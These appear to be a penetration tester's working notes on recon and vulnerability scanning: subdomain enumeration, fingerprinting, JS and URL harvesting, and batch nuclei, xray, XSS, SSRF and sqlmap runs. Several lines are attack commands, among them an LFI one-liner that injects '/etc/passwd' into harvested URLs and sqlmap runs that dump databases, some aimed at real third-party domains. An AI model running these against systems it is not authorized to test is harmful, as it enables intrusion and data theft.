Working notes, to be refined through practice.

ICP filing lookup: https://beian.miit.gov.cn/#/Integrated/index
Qichacha (企查查, company registration lookup)

Subdomains from Certificate Transparency
Extract the names (replace DOMAIN with the target domain):
```bash
curl -s "https://crt.sh/?q=DOMAIN&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u | tee -a sh.txt
```
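An added Python example (not from the original notes) that performs the same extraction as the crt.sh pipeline above on a constructed sample of crt.sh's JSON, plus two checks the shell version lacks: case folding and an in-scope filter, so a name that merely contains the domain string is not recorded as an asset. The sample records, the function name and `example.com` are assumptions.

```python
"""Parse crt.sh JSON (the data the curl | jq pipeline consumes) into a clean,
de-duplicated list of hostnames that belong to one target domain."""
import json

# Constructed sample in the shape crt.sh returns for ?q=<domain>&output=json.
# Only the fields used here are included. name_value may hold several names
# separated by newlines, and wildcard certificates start with "*.".
SAMPLE = json.dumps([
    {"common_name": "www.example.com", "name_value": "www.example.com\nexample.com"},
    {"common_name": "*.example.com", "name_value": "*.example.com"},
    {"common_name": "Mail.Example.com", "name_value": "Mail.Example.com"},
    {"common_name": "dev.example.com", "name_value": "dev.example.com\nwww.example.com"},
    {"common_name": "example.com.attacker.test", "name_value": "example.com.attacker.test"},
])


def ct_hostnames(json_text: str, domain: str) -> list[str]:
    """Return sorted unique hostnames in scope for `domain`.

    Mirrors `jq -r '.[].name_value' | sed 's/\\*\\.//g' | sort -u`, then lowercases
    every name and keeps only the apex or names ending in ".<domain>".
    """
    domain = domain.lower().strip(".")
    names = set()
    for entry in json.loads(json_text):
        for raw in entry.get("name_value", "").split("\n"):
            name = raw.strip().lower()
            if name.startswith("*."):          # wildcard cert: keep the base name
                name = name[2:]
            if name == domain or name.endswith("." + domain):
                names.add(name)
    return sorted(names)


if __name__ == "__main__":
    for host in ct_hostnames(SAMPLE, "example.com"):
        print(host)
```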
whois lookup: the whois.domaintools.com website, or the command line.

nslookup (Windows command)
```bat
nslookup testphp.vulnweb.com -d
```
`-d` lists all records. Reading the output:
- Server: the DNS server used for the query (here public1.114dns.com)
- Address: that DNS server's IP address (here 114.114.114.114)
- Non-authoritative answer: the answer is non-authoritative, i.e. it may come from a cache rather than the authoritative DNS server
- Name: the queried domain (here testphp.vulnweb.com)
- Address: the resolved IP address (here 44.228.249.3)
Website fingerprinting
```bash
whatweb testphp.vulnweb.com
```
or the Wappalyzer browser extension.

WAF detection
```bash
wafw00f testphp.vulnweb.com
```

theHarvester (needs too many API keys)
```bash
python3 theHarvester.py -d baidu.com -b bing,yahoo,baidu
```

recon-ng is msf-like. Maltego has a community edition and Google-dork templates, but they are all in English and do not seem useful for Chinese targets.

https://pentest-tools.com/

Favicon hash (the URL is quoted so the shell does not treat `?` as a glob):
```bash
curl "https://favicon-hash.kmsec.uk/api/?url=https://test.com/favicon.ico" | jq
```

Cyberspace search engine: fofa
```
host="gzu.edu.cn" && status_code="200"
after="2017-01-01" && before="2017-10-01"
host="gzu.edu.cn" && status_code="200" && after="2020-01-01" && before="2024-6-01"
icp="京ICP证030173号"
ip="1.1.1.1"
icon_hash="11111111555"
ip="1.1.1.1/24"
```
The first query filters to status 200, the second to a time window, and the last returns the assets of a whole /24 (C-class) range.
shodan
```
ssl:"testphp.vulnweb.com" 200
```

Subdomain collection: subfinder, sublist3r, oneforall, amass, ksubdomain, spyhunt (昆虫猎人)
amass collects the most passively, subfinder is the fastest passive tool, and ksubdomain collects the most and fastest actively.
```bash
subfinder -dL url.txt -o sub.txt
subfinder -d testphp.vulnweb.com -o subs.txt
```
```bash
sublist3r -v -d testphp.vulnweb.com -p 80,443
```
Verify with dnsx, probe for web services with httpx, then filter for names containing api and similar keywords:
```bash
subfinder -d target.com -silent | dnsx -silent | httpx -silent | grep -E --color 'api|dev|stg|test|admin|demo|stage|pre|vpn'
```
Follow redirects:
```bash
subfinder -d example.com -silent | httpx -silent -follow-redirects -mc 200 | cut -d '/' -f3 | sort -u
```
Windows, with the built-in wordlist:
```bat
.\ksubdomain.exe e -d cc.cn -o gz.txt
```

Liveness probing
```bash
cat sub.txt | httpx-toolkit -ports 443,80,8080,8888 -threads 200 -mc 200 -o aaa.txt
cat sub.txt | httpx -sc -td -ip
httpx -l on-run.txt -td -title -ip -sc -mc 200,301
```
Tools
https://gitee.com/ma-fanxiang/fast-see (detailed result output)

JS discovery: gau, subjs, linkfinder, waybackurls, katana, urlfinder
https://github.com/lc/gau
https://github.com/lc/subjs
https://github.com/GerbenJavado/LinkFinder

gau extracts URLs from the domains, subjs extracts the JS files:
```bash
cat url.txt | gau | subjs | tee js.txt
```
waybackurls has little coverage of Chinese sites; check first whether the site has been archived at all:
```bash
cat url.txt | waybackurls | subjs
```
Wayback Machine history:
```bash
cat sub.txt | waybackurls | tee urls.txt
```
urlfinder works well:
```bash
urlfinder -u http://www.baidu.com -s 200,403 -m 2
```
```bash
katana -u https://www.csmu.edu.tw/ -jc -d 2 | grep "\.js$" | sort -u > test.txt
cat target.txt | (gau || hakrawler || waybackurls || katana) | grep -i -E "\.js" | egrep -v "\.json|\.jsp" | anew js.txt
```
Extract sensitive information from JS: https://github.com/MrEmpy/mantra
Trufflehog (information-leak plugin); API key validation: https://github.com/streaak/keyhacks

Finding IPs: https://github.com/projectdiscovery/uncover
```bash
echo 'ssl:"Uber Technologies, Inc."' | uncover
```
Save the httpx output, extract the IPs from the file, then scan them:
```bash
subfinder -d domain | httpx -sc -td -ip | tee file.txt
grep -E -o '(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)' file.txt
sudo nmap -sV -sC -v -p- -T4 127.0.0.1 -Pn
```
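An added Python example (not from the original notes) for the grep step above: it applies the page's IPv4 regex to a constructed `httpx -sc -td -ip` sample, anchors it so a longer digit run cannot match partially, and groups hostnames by IP so shared hosting is visible before the nmap step. The sample lines and function names are assumptions.

```python
"""Turn httpx output (url, status, tech, ip) into an IP -> hostnames map; a
structured version of grep -E -o '<IPv4 regex>' file.txt."""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# The page's IPv4 regex, with lookarounds so "1234.1.1.1" does not yield "234.1.1.1".
IPV4 = re.compile(
    r"(?<!\d)(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}"
    r"(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)(?!\d)"
)

# Constructed sample in the shape of `httpx -sc -td -ip` output, one live host per line.
SAMPLE_HTTPX = """\
https://www.example.com [200] [Nginx,PHP] [203.0.113.10]
https://api.example.com [401] [Express] [203.0.113.10]
https://dev.example.com [200] [Apache] [198.51.100.7]
https://old.example.com [302] [] [198.51.100.7]
http://cdn.example.com [200] [Cloudflare] [10.0.0.1]
"""


def extract_ips(text: str) -> list[str]:
    """All IPv4 literals in `text`, de-duplicated in first-seen order (the nmap target list)."""
    seen: list[str] = []
    for ip in IPV4.findall(text):
        if ip not in seen:
            seen.append(ip)
    return seen


def hosts_by_ip(text: str) -> dict[str, list[str]]:
    """Map each IP to the hostnames that resolved to it, so one scan per address
    covers every vhost and shared hosting (one IP, many names) is visible."""
    groups: dict[str, set[str]] = defaultdict(set)
    for line in text.splitlines():
        parts = line.split()
        if not parts:
            continue
        host = urlsplit(parts[0]).hostname
        ips = IPV4.findall(line)
        if host and ips:
            groups[ips[-1]].add(host)   # the IP column is the last bracketed field
    return {ip: sorted(hosts) for ip, hosts in groups.items()}


if __name__ == "__main__":
    for ip, hosts in hosts_by_ip(SAMPLE_HTTPX).items():
        print(ip, ",".join(hosts))
```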
Enumerate a username's GitHub repositories: https://github.com/trickest/enumerepo

Directory scanning
```bash
feroxbuster -u https://www.csmu.edu.tw/ -s 200 301 403 -n
```
```bash
dirsearch -u https://testphp.vulnweb.com/ -i 200,301,302
# meant to drop html/js/json results, but did not work well: --exclude-text matches response body text;
# the extension filter is -X / --exclude-extensions
dirsearch -l gzgy.txt -t 50 -x 302,400-520 --exclude-text=html,js,json
# recursive scan, depth 2
dirsearch -l gzcj.txt -t 50 -x 500,502,404,401,400 -r -R 2
```

Katana (武士刀)
```bash
# crawl
katana -u https://www.csmu.edu.tw
katana -list url_list.txt
cat domains | httpx | katana
# JS scan
echo www.viator.com | katana -ps | grep -E "\.js$" | nuclei -t /home/coffinxp/nuclei-templates/http/exposures/ -c 30
# paramspider saves its output under the results folder automatically
paramspider -l li.txt
# photon: extract URLs
python photon.py -u https://www.baidu.com/ --keys -o /root/Desktop/eh0
# reduce URLs to hostnames
cat urls.txt | cut -d "/" -f3 | sort -u > endpoints.txt
```
SSRF testing with ssrfmap (needs a captured request file):
```bash
python3 ssrfmap.py -r /home/coffinxp/raw.txt -p url -m readfiles,portscan
```

Fuzzing
```bash
nuclei -l urls.txt -t /nuclei-templates/fuzzing-templates/
```

LFI
```bash
nuclei -list sus.txt -t /nuclei-templates/vulnerabilities/lfi -o lfi.txt
# batch
nuclei -list ravageband.txt -tags lfi
cat subs.txt | gau | uro | gf lfi | qsreplace "/etc/passwd" | while read url; do if curl -s "$url" | grep -q "root:x:"; then echo "存在LFI漏洞 $url"; fi; done
cat subs.txt | gau | xargs -n 1 -I {} sh -c 'curl -s "{}" | grep -q "root:x:" && echo "{} is vulnerable to LFI"' > lfi.txt
```

Vulnerability scanning
```bash
# scan JS
nuclei -t /nuclei-templates/http/exposures/ -l js.txt -o js1.txt
# high-severity CVEs
nuclei -l gzgy.txt -t cves/ -severity critical,high
# xray in batch
for i in $(cat subs.txt); do ./xray_linux_amd64 ws --basic-crawler "$i" --plugins xss,sqldet,xxe,ssrf,cmd-injection,path-traversal --ho "$(date +"%T").html"; done
```
XSS scanning; XSS cheat sheet: https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
```bash
cat sub.txt | kxss
python3 xsstrike.py -u "url" -l 4 -t 10
echo "testphp.vulnweb.com" | waybackurls | httpx -silent | Gxss -c 100 -p Xss | sort -u | dalfox pipe
```

SQL injection
```bash
## sqlmap
echo "url" | gau | gf sqli | tee sql.txt
sqlmap -m sql.txt --dbs --batch --random-agent
subfinder -d domain.com -all -silent | gau | urldedupe | gf sqli > sql.txt; sqlmap -m sql.txt --batch --dbs --risk 2 --level 5 --random-agent | tee -a sql1.txt
```
The last command finds subdomains automatically, extracts their URLs, deduplicates them so each URL is tested only once, and hands the list to sqlmap in batch mode.